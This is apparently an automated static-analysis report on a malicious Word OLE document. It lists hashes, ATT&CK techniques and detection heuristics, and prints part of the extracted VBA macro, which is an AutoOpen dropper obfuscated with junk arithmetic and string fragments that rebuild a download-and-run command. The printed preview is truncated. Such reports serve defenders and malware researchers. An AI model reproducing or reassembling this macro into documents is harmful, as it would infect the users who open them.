Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb3e80994255137a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 234.6 KB
First seen: 2018-01-23
MD5: b297a1730d71771020547bf834cd1db4
SHA-1: 92f43c83a2aee0387d2ed16eb78dd4f5992f10c2
SHA-256: eb3e80994255137a3d27dce8d8fb7c9eb13545719239a576b77a45a505c2edd8
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function. The macro calls the Shell() function, indicating an attempt to execute external commands. The macro also constructs a URL string, 'Ftn+FtnmGts+GtsetriFtn+FtH8SAf', which is likely used to download and execute a secondary payload. The presence of a password-protected archive lure heuristic further suggests a multi-stage infection process.

Heuristics (8)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA source contains a Shell() call
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://Ftn+FtnmGts+GtsetriFtn+FtH8SAf (in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 78850 bytes
  SHA-256: 1bf97fb096d56cb301ae0d1bafb165aa2ba1aa03976953686e2f651b981c6e70

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "CSBawElibM"
Function fIMEWzP()
On Error Resume Next
FLHbWri = zRHbJEbSqDJVD - CBool(zvzTiiGkjjZRf) * 216045258 / Sqr(jaXNXqqALdVpUQ) + SPhBNpVkSKsjOi / Atn(9898) * BsYjlPjwzNA - CDate(376) - jVwsJqmQRsPSFL / 3 + EDfJcRkccRoij / SkoNslOTRjpc
EhQzSKtoEn = tvJXicwuYrHPp - CBool(JLiDwpinSmm) * 216045258 / Sqr(folTzdZ) + NEjoHPAMOP / Atn(9898) * hPOEwbapZEFd - CDate(376) - kjzKJFuiqS / 3 + EftwioVYD / FmQjmsW
zsmjQAqtl = KGApMqszHnHoz + Mid("vZHnwApAF8wjIhqOsbuqqJm8q44BWwElUuasd = Ftn+FtnneFtn+FtnGts+Gt'+'sw-oGts+Gtsbject Ftn+FtnrandoFtn+Ft'+'nm;LAFtn+FtnwFtn+FiXqzl", 35, 87) + uNKKinP
qlcvM = JJcGbaZbt - CBool(DYiwtVbVM) * 216045258 / Sqr(iwHbEMZ) + llvTAzbSALM / Atn(9898) * KKZRlpN - CDate(376) - UwpOdYnLBBBP / 3 + zqHWjXf / bVQIItTYqp
vHkhEvX = IjApjdAQf - CBool(DiFwXwp) * 216045258 / Sqr(lhzvZQtjU) + iiVlPzqoiarJz / Atn(9898) * womdSDDiPUw - CDate(376) - QMHkvwIKlAiSSF / 3 + iUOYciZ / kiPQQmAOBoSjdj
jklzOus = RiPtcZF - CBool(fTmLLlQNpD) * 216045258 / Sqr(otwSHKWG) + FjwGvowQ / Atn(9898) * OKWcVvsiFm - CDate(376) - hpXRFGIUPH / 3 + FStPzVfQXmzq / spMYAadEjhi
HYFbMb = wmHmvhqbM + Mid("LR3IAiXShEXzWIKMjOiQa+FtncFtn+Ftnh(LFtn+FtnAwFtn'+'+FtnabFtn+FtncFtn+Ftn iFtn+Ftnn LFtn+FtnAwbFtn+FtncdrG", 22, 82) + QwJzDNURu
MajpDGD = fuAoovFTLNzUJA - CBool(TOrNWGffsYkljd) * 216045258 / Sqr(WcBajic) + kDfKEDTRrOGUD / Atn(9898) * QKnzPIQDJYqKr - CDate(376) - SiRRrVGJrv / 3 + bYGtXaIwiMr / jPTdjtGUuMwwI
VBVZNwHV = qHXSAzMaalm - CBool(WDWLHELi) * 216045258 / Sqr(UkwOKWn) + HZiozcwE / Atn(9898) * zAiLFtAKrmpFJD - CDate(376) - UcWXZDpaYR / 3 + MEVWaZHJGK / qOqwETjwDzWLTX
mEobvjPdIvK = hPaHlblfOtG - CBool(vKbkTWHHnj) * 216045258 / Sqr(pXNOmFpLqhRrXI) + YKMBzTC / Atn(9898) * zXanYDI - CDate(376) - nAPljYNzaYh / 3 + rdTEbRwzv / jfmVNqLRRIhD
QHzlvECWC = odilGSsYnjJJlw + Mid("fRYIMbVQinU8NkSt12pLwuW5TnR.Ftn+FtGts+GtsnSpliFtn+Ftnt(m9R,Ftn+Ftnm9R);LAwkFtn+FtnarapaFtn+FtnsFtn+FtGts+Gtsn FtGts+Gtsn+Ftn= LAwnsadasd.nFtn+Ftnext(1Gts+Gt'+'sFtn+Gts+GtsFtn, 34FR9RK", 26, 154) + NMIbviCYsZQl
XqDqlBtqMYL = ZfuIZJtl - CBool(woVMQwAwLVlH) * 216045258 / Sqr(bzWqaOWqsCwT) + bOwlpwc / Atn(9898) * BPwXiEzZ - CDate(376) - wlzrEvl / 3 + jfPrDmWsPWmz / fpiYZjXTsJY
ANEBYHXh = vfpBjNzAtEsvX - CBool(ucdFTlvItOso) * 216045258 / Sqr(EBFodJCdmRLFV) + cCNwRGzS / Atn(9898) * trwEwmlbJ - CDate(376) - UswnQPmVEILSA / 3 + ZSGjRaiullLwjE / rApBMBS
SznnXGv = KbZTwVSiLOOr - CBool(raLiKXHzTk) * 216045258 / Sqr(YYRHbGvoZb) + oSkQzpsGw / Atn(9898) * PuWqmuRHLiqrC - CDate(376) - YDKDESaRucltwt / 3 + RGNljJdvRp / dhNsXzPp
iCzDiU = sDMUIXSNC + Mid("6aFkjQC9nbiJjjFZX6]110),[stRINg][CHAr]39KRn2CN4", 19, 22) + RNRzcbfS
kOcmT = OwjfkuKEbrz - CBool(djFJiJaHMbT) * 216045258 / Sqr(hONIVQnvGorj) + vzzajkFjacKu / Atn(9898) * SDbLRmdzzVhC - CDate(376) - LDEXpoWXnLaj / 3 + rOCGlCNozkT / WFFozbSYzZBcCn
kvrONJbas = BrmQNljnp - CBool(UJOqdCVTVBvHL) * 216045258 / Sqr(nLwhUfzTh) + lXuTuisLjjEcvS / Atn(9898) * NnzSrWtjXdC - CDate(376) - zSKsAcREFHCZr / 3 + jXfKKQfD / szAparrX
CVNHuTiGhwv = IHhSMaEwfpfS - CBool(SQkKqtHsnjDLi) * 216045258 / Sqr(aUnGZqHtWDcCU) + lzwOvaSLiYap / Atn(9898) * rUYiGdiddsiF - CDate(376) - lZtjhoZUGok / 3 + QIZPmOjjIPYwZ / ZlJIHQJTos
wBwJFtqqlNj = XJfrBilvPu + Mid("l).reP'+'lacE(Gt3tXPnlfkMhf", 2, 15) + jiouNTkcSjQjp
CSzfp = sqssZnDAdNXGk - CBool(binWBMSlHv) * 216045258 / Sqr(RuzmrMOk) + hAQrwrHK / Atn(9898) * SfAHXZHmVqKX - CDate(376) - jwjHsDN / 3 + AIVXsaSwXJFH / pQKKXafErYZoaR
YFVLiJR = VusuIrODdH - CBool(scIWHiuwwPr) * 216045258 / Sqr(nXJqklLAO) + CboWNnhQiWA / Atn(9898) * coLrsWDYDIdhEW - CDate(376) - BiRSHQOajhlQHR / 3 + hVMrvUistowq / tzHRrnflREt
ALfGjCNTos = VdiiJkviSJzljJ - CBool(KAXufZr) * 216045258 / Sqr(qNtsUYUXmou) + aNQImjBMppE / Atn(9898) * XDFGWmqXd - CDate(376) - sVPsaJw / 3 + MzmiawjOIvYf / AIbURTNAAzXB
YkjMQ = KrzDwzRWf + Mid("N8tnbFtn
... (truncated)